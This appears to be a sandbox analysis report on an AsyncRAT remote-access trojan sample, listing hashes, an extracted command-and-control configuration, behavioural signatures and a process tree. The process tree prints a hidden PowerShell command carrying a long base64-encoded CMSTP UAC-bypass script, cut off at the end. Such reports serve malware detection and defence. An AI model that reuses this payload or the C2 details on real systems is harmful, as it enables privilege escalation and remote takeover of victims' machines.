Overview
overview
10Static
static
10AsyncRAT/AsyncRAT.lnk
windows10-2004-x64
10AsyncRAT/AsyncRAT.lnk
windows10-ltsc 2021-x64
10AsyncRAT/P...at.dll
windows10-2004-x64
1AsyncRAT/P...at.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ra.dll
windows10-2004-x64
1AsyncRAT/P...ra.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...us.dll
windows10-2004-x64
1AsyncRAT/P...us.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ns.dll
windows10-2004-x64
1AsyncRAT/P...ns.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ry.dll
windows10-2004-x64
1AsyncRAT/P...ry.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ra.dll
windows10-2004-x64
1AsyncRAT/P...ra.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...op.dll
windows10-2004-x64
1AsyncRAT/P...op.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...le.dll
windows10-2004-x64
1AsyncRAT/P...le.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ry.dll
windows10-2004-x64
1AsyncRAT/P...ry.dll
windows10-ltsc 2021-x64
1AsyncRAT/S...ub.exe
windows10-2004-x64
10AsyncRAT/S...ub.exe
windows10-ltsc 2021-x64
10AsyncRAT/u...ig.exe
windows10-2004-x64
10AsyncRAT/u...ig.exe
windows10-ltsc 2021-x64
10Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22-12-2024 21:46
Behavioral task
behavioral1
Sample
AsyncRAT/AsyncRAT.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
AsyncRAT/AsyncRAT.lnk
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
AsyncRAT/Plugins/Chat.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
AsyncRAT/Plugins/Chat.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
AsyncRAT/Plugins/Extra.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
AsyncRAT/Plugins/Extra.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral7
Sample
AsyncRAT/Plugins/FileManager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
AsyncRAT/Plugins/FileManager.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral9
Sample
AsyncRAT/Plugins/FileSearcher.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
AsyncRAT/Plugins/FileSearcher.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral11
Sample
AsyncRAT/Plugins/LimeLogger.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
AsyncRAT/Plugins/LimeLogger.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral13
Sample
AsyncRAT/Plugins/Miscellaneous.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
AsyncRAT/Plugins/Miscellaneous.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral15
Sample
AsyncRAT/Plugins/Options.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
AsyncRAT/Plugins/Options.dll
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral17
Sample
AsyncRAT/Plugins/ProcessManager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
AsyncRAT/Plugins/ProcessManager.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral19
Sample
AsyncRAT/Plugins/Recovery.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
AsyncRAT/Plugins/Recovery.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral21
Sample
AsyncRAT/Plugins/RemoteCamera.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
AsyncRAT/Plugins/RemoteCamera.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral23
Sample
AsyncRAT/Plugins/RemoteDesktop.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
AsyncRAT/Plugins/RemoteDesktop.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral25
Sample
AsyncRAT/Plugins/SendFile.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
AsyncRAT/Plugins/SendFile.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral27
Sample
AsyncRAT/Plugins/SendMemory.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
AsyncRAT/Plugins/SendMemory.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral29
Sample
AsyncRAT/Stub/Stub.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
AsyncRAT/Stub/Stub.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral31
Sample
AsyncRAT/upload.config.exe
Resource
win10v2004-20241007-en
General
-
Target
AsyncRAT/upload.config.exe
-
Size
9.8MB
-
MD5
7a1eaa75ff1d1e83f564d0e5312a0930
-
SHA1
91988fcd3ffe2945d614f2141e0124f9ebcd6e01
-
SHA256
de47ee6f5098830b2569a1f0f889e021a9be2604093e3e157852060d307aa9f2
-
SHA512
b1d06ffc724e7a393387fb84900af0badf3a84bfe3ea0b2bed27d41f3114586e7b25b9661c2f23476b51b6cf9d5dcb36cf1d807c5441909b2a8315e4d40cc8c7
-
SSDEEP
49152:Plnb9f3/00iPuJXm6Os/CTu9VnAaZ+6AmX9mQXd0ujFFoyS+km9nmgMfq9+s6ewR:NnF00iPu
Malware Config
Extracted
asyncrat
0.5.8
Default
jt8iyre.localto.net:2101
jt8iyre.localto.net:55644
AbAUwI3PK3e3
-
delay
3
-
install
false
-
install_file
winserve.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral32/memory/2964-198-0x00000000078D0000-0x00000000078E2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 38 2964 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3468 powershell.exe 2756 powershell.exe 4028 powershell.exe 928 powershell.exe 2964 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4440 AsyncRAT.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 4780 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 3468 powershell.exe 3468 powershell.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 2756 powershell.exe 2756 powershell.exe 2756 powershell.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4440 AsyncRAT.exe 4028 powershell.exe 4028 powershell.exe 928 powershell.exe 928 powershell.exe 2964 powershell.exe 2964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeIncreaseQuotaPrivilege 2756 powershell.exe Token: SeSecurityPrivilege 2756 powershell.exe Token: SeTakeOwnershipPrivilege 2756 powershell.exe Token: SeLoadDriverPrivilege 2756 powershell.exe Token: SeSystemProfilePrivilege 2756 powershell.exe Token: SeSystemtimePrivilege 2756 powershell.exe Token: SeProfSingleProcessPrivilege 2756 powershell.exe Token: SeIncBasePriorityPrivilege 2756 powershell.exe Token: SeCreatePagefilePrivilege 2756 powershell.exe Token: SeBackupPrivilege 2756 powershell.exe Token: SeRestorePrivilege 2756 powershell.exe Token: SeShutdownPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeSystemEnvironmentPrivilege 2756 powershell.exe Token: SeRemoteShutdownPrivilege 2756 powershell.exe Token: SeUndockPrivilege 2756 powershell.exe Token: SeManageVolumePrivilege 2756 powershell.exe Token: 33 2756 powershell.exe Token: 34 2756 powershell.exe Token: 35 2756 powershell.exe Token: 36 2756 powershell.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 928 powershell.exe Token: SeIncreaseQuotaPrivilege 928 powershell.exe Token: SeSecurityPrivilege 928 powershell.exe Token: SeTakeOwnershipPrivilege 928 powershell.exe Token: SeLoadDriverPrivilege 928 powershell.exe Token: SeSystemProfilePrivilege 928 powershell.exe Token: SeSystemtimePrivilege 928 powershell.exe Token: SeProfSingleProcessPrivilege 928 powershell.exe Token: SeIncBasePriorityPrivilege 928 powershell.exe Token: SeCreatePagefilePrivilege 928 powershell.exe Token: SeBackupPrivilege 928 powershell.exe Token: SeRestorePrivilege 928 powershell.exe Token: SeShutdownPrivilege 928 powershell.exe Token: SeDebugPrivilege 928 powershell.exe Token: SeSystemEnvironmentPrivilege 928 powershell.exe Token: SeRemoteShutdownPrivilege 928 powershell.exe Token: SeUndockPrivilege 928 powershell.exe Token: SeManageVolumePrivilege 928 powershell.exe Token: 33 928 powershell.exe Token: 34 928 powershell.exe Token: 35 928 powershell.exe Token: 36 928 powershell.exe Token: SeIncreaseQuotaPrivilege 928 powershell.exe Token: SeSecurityPrivilege 928 powershell.exe Token: SeTakeOwnershipPrivilege 928 powershell.exe Token: SeLoadDriverPrivilege 928 powershell.exe Token: SeSystemProfilePrivilege 928 powershell.exe Token: SeSystemtimePrivilege 928 powershell.exe Token: SeProfSingleProcessPrivilege 928 powershell.exe Token: SeIncBasePriorityPrivilege 928 powershell.exe Token: SeCreatePagefilePrivilege 928 powershell.exe Token: SeBackupPrivilege 928 powershell.exe Token: SeRestorePrivilege 928 powershell.exe Token: SeShutdownPrivilege 928 powershell.exe Token: SeDebugPrivilege 928 powershell.exe Token: SeSystemEnvironmentPrivilege 928 powershell.exe Token: SeRemoteShutdownPrivilege 928 powershell.exe Token: SeUndockPrivilege 928 powershell.exe Token: SeManageVolumePrivilege 928 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4440 AsyncRAT.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4440 AsyncRAT.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 3060 wrote to memory of 556 3060 upload.config.exe 82 PID 3060 wrote to memory of 556 3060 upload.config.exe 82 PID 3060 wrote to memory of 4376 3060 upload.config.exe 83 PID 3060 wrote to memory of 4376 3060 upload.config.exe 83 PID 556 wrote to memory of 4440 556 cmd.exe 86 PID 556 wrote to memory of 4440 556 cmd.exe 86 PID 4376 wrote to memory of 1864 4376 cmd.exe 87 PID 4376 wrote to memory of 1864 4376 cmd.exe 87 PID 1864 wrote to memory of 3468 1864 WScript.exe 88 PID 1864 wrote to memory of 3468 1864 WScript.exe 88 PID 3468 wrote to memory of 2484 3468 powershell.exe 93 PID 3468 wrote to memory of 2484 3468 powershell.exe 93 PID 2484 wrote to memory of 2440 2484 csc.exe 94 PID 2484 wrote to memory of 2440 2484 csc.exe 94 PID 3468 wrote to memory of 4248 3468 powershell.exe 95 PID 3468 wrote to memory of 4248 3468 powershell.exe 95 PID 1864 wrote to memory of 4396 1864 WScript.exe 111 PID 1864 wrote to memory of 4396 1864 WScript.exe 111 PID 4396 wrote to memory of 4028 4396 cmd.exe 113 PID 4396 wrote to memory of 4028 4396 cmd.exe 113 PID 4396 wrote to memory of 4028 4396 cmd.exe 113 PID 4028 wrote to memory of 928 4028 powershell.exe 114 PID 4028 wrote to memory of 928 4028 powershell.exe 114 PID 4028 wrote to memory of 928 4028 powershell.exe 114 PID 4028 wrote to memory of 2408 4028 powershell.exe 117 PID 4028 wrote to memory of 2408 4028 powershell.exe 117 PID 4028 wrote to memory of 2408 4028 powershell.exe 117 PID 2408 wrote to memory of 460 2408 WScript.exe 118 PID 2408 wrote to memory of 460 2408 WScript.exe 118 PID 2408 wrote to memory of 460 2408 WScript.exe 118 PID 460 wrote to memory of 2964 460 cmd.exe 120 PID 460 wrote to memory of 2964 460 cmd.exe 120 PID 460 wrote to memory of 2964 460 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe"C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SYSTEM32\cmd.execmd /k start AsyncRAT.exe2⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\AsyncRAT\AsyncRAT.exeAsyncRAT.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4440
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k start 7254_output.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AsyncRAT\7254_output.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCR